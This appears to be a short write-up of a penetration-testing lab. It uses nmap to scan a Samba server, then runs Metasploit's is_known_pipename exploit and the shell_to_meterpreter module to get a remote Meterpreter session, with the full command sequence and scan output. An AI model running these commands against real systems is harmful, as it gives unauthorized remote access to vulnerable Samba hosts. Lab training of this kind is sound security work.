Upgrading Command Shells To Meterpreter Shells

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable service will be accessible at demo.ine.local.

Objective: Exploit the vulnerable service using suitable Metasploit module and then upgrade the command shell session to a meterpreter session.

Tools

The best tools for this lab are:

Nmap
Metasploit Framework

Writeup

nmap -sSVC demo.ine.local

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.1.17 (workgroup: WORKGROUP)
MAC Address: 02:42:C0:9A:73:03 (Unknown)
Service Info: Host: DEMO

Host script results:
| smb2-time: 
|   date: 2025-06-09T17:37:17
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.17)
|   Computer name: demo
|   NetBIOS computer name: DEMO\x00
|   Domain name: ine.local
|   FQDN: demo.ine.local
|_  System time: 2025-06-09T17:37:14+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:0:0: 
|_    Message signing enabled but not required

Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)Exploit Database

msfconsole
use exploit/linux/samba/is_known_pipename
set rhosts demo.ine.local
run

Ctrl + Z
sessions -i

use post/multi/manage/shell_to_meterpreter
set session 2
set lhost 192.154.115.2
run

sessions -i 4

PreviousMeterpreter Basics NextWindows Post Exploitation Modules

Last updated 5 months ago